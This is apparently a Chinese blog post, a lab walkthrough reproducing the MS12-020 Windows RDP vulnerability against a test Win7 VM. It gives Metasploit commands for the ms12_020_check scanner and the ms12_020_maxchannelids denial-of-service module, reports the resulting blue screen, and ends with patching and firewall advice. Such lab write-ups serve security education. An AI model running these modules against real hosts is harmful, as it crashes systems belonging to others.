一、漏洞说明
MS12-020全称Microsoft Windows远程桌面协议RDP远程代码执行漏洞,可导致BSOD(死亡蓝屏)
介绍:RDP协议是一个多通道的协议,让用户连上提供微软终端机服务的电脑。windows在处理某些对象时存在错误,可通过特制的RDP报文访问未初始化或已经删除的对象,导致任意代码执行。然后控制系统。
受影响系统:开了RDP的Microsoft Windows XP Professional /Microsoft Windows XP Home/ Microsoft Windows Server 2003 Standard Edition /Microsoft Windows Server 2003 Enterprise Edition /Microsoft Windows Server 2003 Datacenter Edition /Microsoft Windows 7
https://technet.microsoft.com/library/security/ms12-020
二、实验设备
目标靶机:未修复MS12-020漏洞的Win7虚拟机 (防火墙关闭,开启3389端口)
攻击靶机:Kali(带有msfconsole)
必要条件:(大坑)攻击靶机和目标靶机能相互ping通,攻击靶机和目标靶机在同一局域网下
三、复现过程
1.使用工具namp扫描是否开启3389端口
2.kali启动msfconsole
3.首先利用第一个模块来对目标网段进行扫描。
命令如下:use auxiliary/scanner/rdp/ms12_020_check 检查是否存在ms12_020漏洞,进入漏洞利用模块show options 查看所需参数set RHOSTS192.168.43.112 设置目标IP地址run 执行
通过下图可以看到在192.168.43.112:3389这个地址后面有这样一句话The target is vulnerable,这句的意思是目标是脆弱的,那么说明这台主机存在这个漏洞,检测出来有Ms12_020漏洞。
4.接着我们需要用到另一个模块来对漏洞主机进行攻击。
命令如下:use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 选择模块show options 查看需设置选项。set RHOST 192.168.43.112 设置目标IP地址run 执行
如下图所示:
4.查看win7虚拟机,已经蓝屏
四、修复建议
1. 打开防火墙或者关闭3389端口
2.若需要用,就对防火墙配置策略,允许哪些IP才可以访问你RDP协议。
五、写在最后
免责声明:本站提供的安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!本文部分内容来自网络,在此说明。
转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。
欢迎关注公众号:24h进德修业,一名普通的白帽子,维护着一个既讲技术又有温度的原创号,一如既往地学习和分享,希望能够给大家带来帮助,前行的道路上感谢有您的关注与支持。
本文始发于微信公众号(24h进德修业):CVE-2012-0002(MS12_020)3389远程溢出漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论